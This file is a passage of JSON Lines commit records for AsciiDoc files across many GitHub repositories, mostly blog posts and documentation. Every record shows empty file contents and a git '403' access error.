ajsharma\/elasticsearch,polyfractal\/elasticsearch,vingupta3\/elasticsearch,mjason3\/elasticsearch,queirozfcom\/elasticsearch,diendt\/elasticsearch,himanshuag\/elasticsearch,mmaracic\/elasticsearch,skearns64\/elasticsearch,strapdata\/elassandra,mnylen\/elasticsearch,18098924759\/elasticsearch,schonfeld\/elasticsearch,mrorii\/elasticsearch,NBSW\/elasticsearch,thecocce\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,petabytedata\/elasticsearch,MetSystem\/elasticsearch,JSCooke\/elasticsearch,hechunwen\/elasticsearch,MaineC\/elasticsearch,iantruslove\/elasticsearch,skearns64\/elasticsearch,wbowling\/elasticsearch,Shepard1212\/elasticsearch,lchennup\/elasticsearch,tebriel\/elasticsearch,pritishppai\/elasticsearch,iacdingping\/elasticsearch,sdauletau\/elasticsearch,avikurapati\/elasticsearch,snikch\/elasticsearch,mmaracic\/elasticsearch,uschindler\/elasticsearch,EasonYi\/elasticsearch,Collaborne\/elasticsearch,scorpionvicky\/elasticsearch,humandb\/elasticsearch,caengcjd\/elasticsearch,jimhooker2002\/elasticsearch,vvcephei\/elasticsearch,lzo\/elasticsearch-1,JSCooke\/elasticsearch,diendt\/elasticsearch,overcome\/elasticsearch,alexshadow007\/elasticsearch,kunallimaye\/elasticsearch,vvcephei\/elasticsearch,AndreKR\/elasticsearch,Widen\/elasticsearch,glefloch\/elasticsearch,MichaelLiZhou\/elasticsearch,jango2015\/elasticsearch,achow\/elasticsearch,SergVro\/elasticsearch,schonfeld\/elasticsearch,huanzhong\/elasticsearch,milodky\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,nrkkalyan\/elasticsearch,nilabhsagar\/elasticsearch,sneivandt\/elasticsearch,qwerty4030\/elasticsearch,HonzaKral\/elasticsearch,lzo\/elasticsearch-1,cnfire\/elasticsearch-1,javachengwc\/elasticsearch,hechunwen\/elasticsearch,Collaborne\/elasticsearch,ouyangkongtong\/elasticsearch,pablocastro\/elasticsearch,hanswang\/elasticsearch,qwerty4030\/elasticsearch,pablocastro\/elasticsearch,vvcephei\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,strapdata\/elassandra5-rc,ImpressTV\/elasticsearch,knight1128\/elasticsearch,chirilo\/elasticsearch,kalburgimanjunath\/elasticsearch,C-Bish\/elasticsearch,zhiqinghuang\/elasticsearch,kubum\/elasticsearch,winstonewert\/elasticsearch,elasticdog\/elasticse
arch,palecur\/elasticsearch,ESamir\/elasticsearch,ydsakyclguozi\/elasticsearch,jbertouch\/elasticsearch,rmuir\/elasticsearch,jimhooker2002\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,areek\/elasticsearch,caengcjd\/elasticsearch,hanswang\/elasticsearch,ulkas\/elasticsearch,kenshin233\/elasticsearch,18098924759\/elasticsearch,cwurm\/elasticsearch,amit-shar\/elasticsearch,girirajsharma\/elasticsearch,rmuir\/elasticsearch,naveenhooda2000\/elasticsearch,Siddartha07\/elasticsearch,kubum\/elasticsearch,Fsero\/elasticsearch,fekaputra\/elasticsearch,scorpionvicky\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,djschny\/elasticsearch,achow\/elasticsearch,zhiqinghuang\/elasticsearch,jchampion\/elasticsearch,knight1128\/elasticsearch,linglaiyao1314\/elasticsearch,pozhidaevak\/elasticsearch,jimczi\/elasticsearch,nrkkalyan\/elasticsearch,dpursehouse\/elasticsearch,abibell\/elasticsearch,awislowski\/elasticsearch,kingaj\/elasticsearch,schonfeld\/elasticsearch,iantruslove\/elasticsearch,apepper\/elasticsearch,F0lha\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,tahaemin\/elasticsearch,zeroctu\/elasticsearch,girirajsharma\/elasticsearch,mbrukman\/elasticsearch,markwalkom\/elasticsearch,coding0011\/elasticsearch,tebriel\/elasticsearch,ThalaivaStars\/OrgRepo1,iantruslove\/elasticsearch,ricardocerq\/elasticsearch,lchennup\/elasticsearch,kenshin233\/elasticsearch,masaruh\/elasticsearch,lmtwga\/elasticsearch,kalburgimanjunath\/elasticsearch,lightslife\/elasticsearch,nomoa\/elasticsearch,ThalaivaStars\/OrgRepo1,huanzhong\/elasticsearch,strapdata\/elassandra5-rc,dylan8902\/elasticsearch,JervyShi\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,rlugojr\/elasticsearch,ImpressTV\/elasticsearch,hirdesh2008\/elasticsearch,Fsero\/elasticsearch,elasticdog\/elasticsearch,mute\/elasticsearch,yuy168\/elasticsearch,trangvh\/elasticsearch,apepper\/elasticsearch,ivansun1010\/elasticsearch,gfyoung\/elasticsearch,szroland\/elasticsearch,MjAbuz\/elasticsearch,wangtuo\/elasticsearch,JervyShi\/elasticsearch,geidies\/elasticsearch,Shekharrajak\/elasticsearch,adrianbk\/elasticsearch,F0lha\/elasticsearch,amaliujia\/elasticsearch,drewr\/elasticsearch,Widen\/elasticsearch,skearns64\/elasticsearch,a2lin\/elasticsearch,loconsolutions\/elasticsearch,mgalushka\/elasticsearch,bestwpw\/elasticsearch,wuranbo\/elasticsearch,djschny\/elasticsearch,elancom\/elasticsearch,MetSystem\/elasticsearch,yongminxia\/elasticsearch,lmtwga\/elasticsearch,scottsom\/elasticsearch,chirilo\/elasticsearch,pozhidaevak\/elasticsearch,hafkensite\/elasticsearch,Uiho\/elasticsearch,iantruslove\/elasticsearch,yynil\/elasticsearch,kunallimaye\/elasticsearch,rhoml\/elasticsearch,wayeast\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,sauravmondallive\/elasticsearch,tahaemin\/elasticsearch,tsohil\/elasticsearch,hirdesh2008\/elasticsearch,vroyer\/elassandra,kimimj\/elasticsearch,alexshadow007\/elasticsearch,mcku\/elasticsearch,drewr\/elasticsearch,Charlesdong\/elasticsearch,strapdata\/elassandra,liweinan0423\/elasticsearch,PhaedrusTheGreek\/elasticsearch,fekaputra\/elasticsearch,xingguang2013\/elasticsearch,ImpressTV\/elasticsearch,18098924759\/elasticsearch,maddin2016\/elasticsearch,gfyoung\/elasticsearch,mikemccand\/elasticsearch,jimhooker2002\/elasticsearch,mm0\/elasticsearch,phani546\/elasticsearch,zeroctu\/elasticsearch,sc0ttkclark\/elasticsearch,jeteve\/elasticsearch,luiseduardohdbackup\/elasticsearch,queirozfcom\/elasticsearch,Chhunlong\/elasticsearch,apepper\/elasticsearch,Widen\/elasticsearch,wayeast\/elasticsearch,Rygbee\/elasticsearch,Stacey-G
ammon\/elasticsearch,achow\/elasticsearch,strapdata\/elassandra-test,sauravmondallive\/elasticsearch,fekaputra\/elasticsearch,kingaj\/elasticsearch,myelin\/elasticsearch,SergVro\/elasticsearch,StefanGor\/elasticsearch,nezirus\/elasticsearch,jpountz\/elasticsearch,strapdata\/elassandra5-rc,hafkensite\/elasticsearch,ESamir\/elasticsearch,kcompher\/elasticsearch,Shekharrajak\/elasticsearch,sdauletau\/elasticsearch,mrorii\/elasticsearch,cwurm\/elasticsearch,jsgao0\/elasticsearch,masaruh\/elasticsearch,kenshin233\/elasticsearch,njlawton\/elasticsearch,humandb\/elasticsearch,zeroctu\/elasticsearch,fforbeck\/elasticsearch,drewr\/elasticsearch,xuzha\/elasticsearch,markharwood\/elasticsearch,tebriel\/elasticsearch,jango2015\/elasticsearch,trangvh\/elasticsearch,scottsom\/elasticsearch,pranavraman\/elasticsearch,karthikjaps\/elasticsearch,smflorentino\/elasticsearch,mcku\/elasticsearch,MetSystem\/elasticsearch,HonzaKral\/elasticsearch,episerver\/elasticsearch,maddin2016\/elasticsearch,ulkas\/elasticsearch,mcku\/elasticsearch,sarwarbhuiyan\/elasticsearch,jprante\/elasticsearch,lydonchandra\/elasticsearch,drewr\/elasticsearch,sreeramjayan\/elasticsearch,camilojd\/elasticsearch,ydsakyclguozi\/elasticsearch,markwalkom\/elasticsearch,wenpos\/elasticsearch,mgalushka\/elasticsearch,robin13\/elasticsearch,ydsakyclguozi\/elasticsearch,LeoYao\/elasticsearch,zkidkid\/elasticsearch,hafkensite\/elasticsearch,lightslife\/elasticsearch,YosuaMichael\/elasticsearch,wittyameta\/elasticsearch,liweinan0423\/elasticsearch,franklanganke\/elasticsearch,mjason3\/elasticsearch,tahaemin\/elasticsearch,camilojd\/elasticsearch,milodky\/elasticsearch,ulkas\/elasticsearch,jimczi\/elasticsearch,JackyMai\/elasticsearch,ricardocerq\/elasticsearch,sc0ttkclark\/elasticsearch,wimvds\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,nomoa\/elasticsearch,MichaelLiZhou\/elasticsearch,cnfire\/elasticsearch-1,Liziyao\/elasticsearch,humandb\/elasticsearch,yynil\/elasticsearch,zhiqinghuang\/elasticsearch,Shepard1212\/elasticsearch,strapdata\/elassandra-test,rlugojr\/elasticsearch,kalimatas\/elasticsearch,henakamaMSFT\/elasticsearch,LewayneNaidoo\/elasticsearch,kingaj\/elasticsearch,yuy168\/elasticsearch,chirilo\/elasticsearch,winstonewert\/elasticsearch,Charlesdong\/elasticsearch,sarwarbhuiyan\/elasticsearch,sauravmondallive\/elasticsearch,khiraiwa\/elasticsearch,markwalkom\/elasticsearch,martinstuga\/elasticsearch,achow\/elasticsearch,kingaj\/elasticsearch,shreejay\/elasticsearch,Fsero\/elasticsearch,mrorii\/elasticsearch,girirajsharma\/elasticsearch,onegambler\/elasticsearch,YosuaMichael\/elasticsearch,Chhunlong\/elasticsearch,brandonkearby\/elasticsearch,dylan8902\/elasticsearch,alexbrasetvik\/elasticsearch,markwalkom\/elasticsearch,IanvsPoplicola\/elasticsearch,uschindler\/elasticsearch,mjhennig\/elasticsearch,Ansh90\/elasticsearch,kalburgimanjunath\/elasticsearch,fekaputra\/elasticsearch,dataduke\/elasticsearch,linglaiyao1314\/elasticsearch,njlawton\/elasticsearch,Siddartha07\/elasticsearch,dylan8902\/elasticsearch,KimTaehee\/elasticsearch,slavau\/elasticsearch,spiegela\/elasticsearch,infusionsoft\/elasticsearch,i-am-Nathan\/elasticsearch,scottsom\/elasticsearch,ivansun1010\/elasticsearch,wayeast\/elasticsearch,nrkkalyan\/elasticsearch,jango2015\/elasticsearch,milodky\/elasticsearch,polyfractal\/elasticsearch,IanvsPoplicola\/elasticsearch,kcompher\/elasticsearch,kalburgimanjunath\/elasticsearch,mute\/elasticsearch,yongminxia\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,GlenRSmith\/elasticsearch,hafkensite\/elasticsearch,markllama\/
elasticsearch,MisterAndersen\/elasticsearch,karthikjaps\/elasticsearch,Shekharrajak\/elasticsearch,zkidkid\/elasticsearch,milodky\/elasticsearch,fernandozhu\/elasticsearch,bawse\/elasticsearch,vietlq\/elasticsearch,ydsakyclguozi\/elasticsearch,pranavraman\/elasticsearch,likaiwalkman\/elasticsearch,HarishAtGitHub\/elasticsearch,NBSW\/elasticsearch,xpandan\/elasticsearch,luiseduardohdbackup\/elasticsearch,knight1128\/elasticsearch,KimTaehee\/elasticsearch,linglaiyao1314\/elasticsearch,markllama\/elasticsearch,Brijeshrpatel9\/elasticsearch,jango2015\/elasticsearch,truemped\/elasticsearch,clintongormley\/elasticsearch,mmaracic\/elasticsearch,rento19962\/elasticsearch,xingguang2013\/elasticsearch,JervyShi\/elasticsearch,elasticdog\/elasticsearch,iacdingping\/elasticsearch,petabytedata\/elasticsearch,pritishppai\/elasticsearch,mute\/elasticsearch,thecocce\/elasticsearch,onegambler\/elasticsearch,StefanGor\/elasticsearch,avikurapati\/elasticsearch,dataduke\/elasticsearch,nknize\/elasticsearch,sdauletau\/elasticsearch,JervyShi\/elasticsearch,sposam\/elasticsearch,obourgain\/elasticsearch,ESamir\/elasticsearch,zeroctu\/elasticsearch,mjhennig\/elasticsearch,Fsero\/elasticsearch,sarwarbhuiyan\/elasticsearch,ulkas\/elasticsearch,jprante\/elasticsearch,coding0011\/elasticsearch,wittyameta\/elasticsearch,luiseduardohdbackup\/elasticsearch,queirozfcom\/elasticsearch,kingaj\/elasticsearch,SergVro\/elasticsearch,pablocastro\/elasticsearch,milodky\/elasticsearch,NBSW\/elasticsearch,Ansh90\/elasticsearch,Ansh90\/elasticsearch,iantruslove\/elasticsearch,gingerwizard\/elasticsearch,wenpos\/elasticsearch,areek\/elasticsearch,dataduke\/elasticsearch,humandb\/elasticsearch,geidies\/elasticsearch,beiske\/elasticsearch,ivansun1010\/elasticsearch,ouyangkongtong\/elasticsearch,YosuaMichael\/elasticsearch,uschindler\/elasticsearch,pozhidaevak\/elasticsearch,adrianbk\/elasticsearch,rmuir\/elasticsearch,vingupta3\/elasticsearch,ouyangkongtong\/elasticsearch,slavau\/elasticsearch,martinstuga\/elasticsearch,spiegela\/elasticsearch,gingerwizard\/elasticsearch,mbrukman\/elasticsearch,HarishAtGitHub\/elasticsearch,jimczi\/elasticsearch,mm0\/elasticsearch,MetSystem\/elasticsearch,hechunwen\/elasticsearch,abibell\/elasticsearch,beiske\/elasticsearch,mcku\/elasticsearch,iantruslove\/elasticsearch,henakamaMSFT\/elasticsearch,gmarz\/elasticsearch,scottsom\/elasticsearch,sdauletau\/elasticsearch,iamjakob\/elasticsearch,iamjakob\/elasticsearch,hechunwen\/elasticsearch,hechunwen\/elasticsearch,martinstuga\/elasticsearch,markllama\/elasticsearch,JackyMai\/elasticsearch,Charlesdong\/elasticsearch,bawse\/elasticsearch,pozhidaevak\/elasticsearch,Fsero\/elasticsearch,artnowo\/elasticsearch,dongjoon-hyun\/elasticsearch,jpountz\/elasticsearch,hydro2k\/elasticsearch,tkssharma\/elasticsearch,hirdesh2008\/elasticsearch,rmuir\/elasticsearch,hydro2k\/elasticsearch,Uiho\/elasticsearch,smflorentino\/elasticsearch,tahaemin\/elasticsearch,mgalushka\/elasticsearch,hydro2k\/elasticsearch,fforbeck\/elasticsearch,PhaedrusTheGreek\/elasticsearch,areek\/elasticsearch,andrestc\/elasticsearch,petabytedata\/elasticsearch,Liziyao\/elasticsearch,sposam\/elasticsearch,pablocastro\/elasticsearch,dataduke\/elasticsearch,rento19962\/elasticsearch,strapdata\/elassandra-test,Uiho\/elasticsearch,huanzhong\/elasticsearch,polyfractal\/elasticsearch,SergVro\/elasticsearch,fforbeck\/elasticsearch,gingerwizard\/elasticsearch,koxa29\/elasticsearch,zhiqinghuang\/elasticsearch,xingguang2013\/elasticsearch,springning\/elasticsearch","old_file":"docs\/reference\/getting-starte
d.asciidoc","new_file":"docs\/reference\/getting-started.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e036446e5ab8d9a9805c3647d679e7e76d06cd4d","subject":"Worked on documentation.","message":"Worked on documentation.\n","repos":"libyal\/winreg-kb,libyal\/winreg-kb,Acidburn0zzz\/winreg-kb","old_file":"documentation\/User Assist keys.asciidoc","new_file":"documentation\/User Assist keys.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Acidburn0zzz\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dfcd0aa5db865e46dfebdd3aec11bb472c54a71f","subject":"Added coverage and CRAN badges to README.adoc","message":"Added coverage and CRAN badges to README.adoc","repos":"phgrosjean\/R-code","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/phgrosjean\/R-code.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8277bf88b7987fd766aa8d126340d8fe2aa003e","subject":"Create README.adoc","message":"Create README.adoc","repos":"Mogztter\/slm-browser,Mogztter\/slm-browser,Mogztter\/slm-browser","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mogztter\/slm-browser.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf0f8274dc0fcc3fc128654b160c2db27a6f2c5e","subject":"Update 2017-02-28-Episode-90-Its-like-Cactus-Jacks-2-with-Pool.adoc","message":"Update 2017-02-28-Episode-90-Its-like-Cactus-Jacks-2-with-Pool.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-02-28-Episode-90-Its-like-Cactus-Jacks-2-with-Pool.adoc","new_file":"_posts\/2017-02-28-Episode-90-Its-like-Cactus-Jacks-2-with-Pool.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"066a6829f39a0dd3a2be106dd01f8e3923ccf8f9","subject":"Add Spring boot actuator quote to commons","message":"Add Spring boot actuator quote to commons\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-quoteSpringBootActuator.adoc","new_file":"src\/main\/docs\/common-quoteSpringBootActuator.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5879c38771c42fc1091b1b8cc1fc5c2db8601777","subject":"Update 2015-05-04-BIG-dataVistsSummer-20151.adoc","message":"Update 
2015-05-04-BIG-dataVistsSummer-20151.adoc","repos":"crazyrandom\/crazyrandom.github.io,crazyrandom\/crazyrandom.github.io,crazyrandom\/crazyrandom.github.io","old_file":"_posts\/2015-05-04-BIG-dataVistsSummer-20151.adoc","new_file":"_posts\/2015-05-04-BIG-dataVistsSummer-20151.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crazyrandom\/crazyrandom.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3d77b4062d15363dcf7e11d18d4f3f64b46d33f","subject":"Update 2095-1-1-Puzzle-6-Admission-e-ticket.adoc","message":"Update 2095-1-1-Puzzle-6-Admission-e-ticket.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2095-1-1-Puzzle-6-Admission-e-ticket.adoc","new_file":"_posts\/2095-1-1-Puzzle-6-Admission-e-ticket.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e0daf639cb1a92ee806393cf3c09561148435533","subject":"Flesh out introduction and use cases a bit more","message":"Flesh out introduction and use cases a bit more\n\nChange-Id: Ife12e3124d465c4d9ffd1edd12c7b82ea6260dc0\nReviewed-on: http:\/\/gerrit.sjc.cloudera.com:8080\/7886\nReviewed-by: Michael Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@cloudera.com>\nTested-by: Michael Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@cloudera.com>\n","repos":"InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu","old_file":"docs\/introduction.adoc","new_file":"docs\/introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"91501433c674d000f82617df30e4614c821bb482","subject":"Renamed '_posts\/2015-01-31-About-me.adoc' to '_posts\/2015-01-31-About-Page.adoc'","message":"Renamed '_posts\/2015-01-31-About-me.adoc' to '_posts\/2015-01-31-About-Page.adoc'","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2015-01-31-About-Page.adoc","new_file":"_posts\/2015-01-31-About-Page.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1733dacdf47796d6bb963f7d13671caa4ef72319","subject":"Update 2015-06-12-Hola-Mundo.adoc","message":"Update 
2015-06-12-Hola-Mundo.adoc","repos":"heberqc\/heberqc.github.io,heberqc\/heberqc.github.io,heberqc\/heberqc.github.io","old_file":"_posts\/2015-06-12-Hola-Mundo.adoc","new_file":"_posts\/2015-06-12-Hola-Mundo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heberqc\/heberqc.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"124d4d60ca308d308e3528b2bffc7a63ce08c7f5","subject":"Update 2015-08-23-First-Blog.adoc","message":"Update 2015-08-23-First-Blog.adoc","repos":"paolo215\/blog,paolo215\/blog,paolo215\/blog","old_file":"_posts\/2015-08-23-First-Blog.adoc","new_file":"_posts\/2015-08-23-First-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/paolo215\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41079c065884265b27ec28a78f29ed44f3f9ad12","subject":"Update 2016-04-11-Inyeccion-S-S-I.adoc","message":"Update 2016-04-11-Inyeccion-S-S-I.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Inyeccion-S-S-I.adoc","new_file":"_posts\/2016-04-11-Inyeccion-S-S-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"025d239327c10c9a3f2faeb0ab6842f9314479da","subject":"Update 2016-12-06-First-Blog-Post.adoc","message":"Update 2016-12-06-First-Blog-Post.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2016-12-06-First-Blog-Post.adoc","new_file":"_posts\/2016-12-06-First-Blog-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"814a50e2f83f232000b7563c124bfa748c5012c1","subject":"Update 2017-05-19-swift-chat.adoc","message":"Update 2017-05-19-swift-chat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-swift-chat.adoc","new_file":"_posts\/2017-05-19-swift-chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae4001c3ad5393b0531b5ffaa1464c85c96d11aa","subject":"Update 2017-05-19-swift-chat.adoc","message":"Update 2017-05-19-swift-chat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-swift-chat.adoc","new_file":"_posts\/2017-05-19-swift-chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99892c59d6db5210a73294a0496374559a519a37","subject":"add 
DevoxxFr video","message":"add DevoxxFr video\n","repos":"oskopek\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,bibryam\/optaplanner-website,psiroky\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,psiroky\/optaplanner-website,bibryam\/optaplanner-website,bibryam\/optaplanner-website,psiroky\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"learn\/testimonialsAndCaseStudies.adoc","new_file":"learn\/testimonialsAndCaseStudies.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"43146d4b0d26f31dad18427d8e8bc1c5d7a06230","subject":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef39217653124649788d8e871a406797177b03ee","subject":"Update 2017-02-09-test1.adoc","message":"Update 2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d05d4dfcc18c6196f53fd587fd434bd59580ff8d","subject":"Update 2018-09-11-Women.adoc","message":"Update 2018-09-11-Women.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-09-11-Women.adoc","new_file":"_posts\/2018-09-11-Women.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"294f64dd6952dbc674e7b43419af85cd10955205","subject":"Update 2015-02-22-The-first-post.adoc","message":"Update 2015-02-22-The-first-post.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-02-22-The-first-post.adoc","new_file":"_posts\/2015-02-22-The-first-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f25c28fb74157bf8f86657dc7f8d80671e789929","subject":"Add connect indexes section to docs","message":"Add connect indexes section to 
docs\n","repos":"wilkerlucio\/pathom,wilkerlucio\/pathom,wilkerlucio\/pathom,wilkerlucio\/pathom","old_file":"docs-src\/modules\/ROOT\/pages\/connect\/indexes.adoc","new_file":"docs-src\/modules\/ROOT\/pages\/connect\/indexes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wilkerlucio\/pathom.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f15d99dd3e5828fe9ea8840ba822471e54cbd34","subject":"Added Forge 3.0.0.Final release announcement","message":"Added Forge 3.0.0.Final release announcement\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2016-03-15-forge-3.0.0.final.asciidoc","new_file":"news\/2016-03-15-forge-3.0.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} 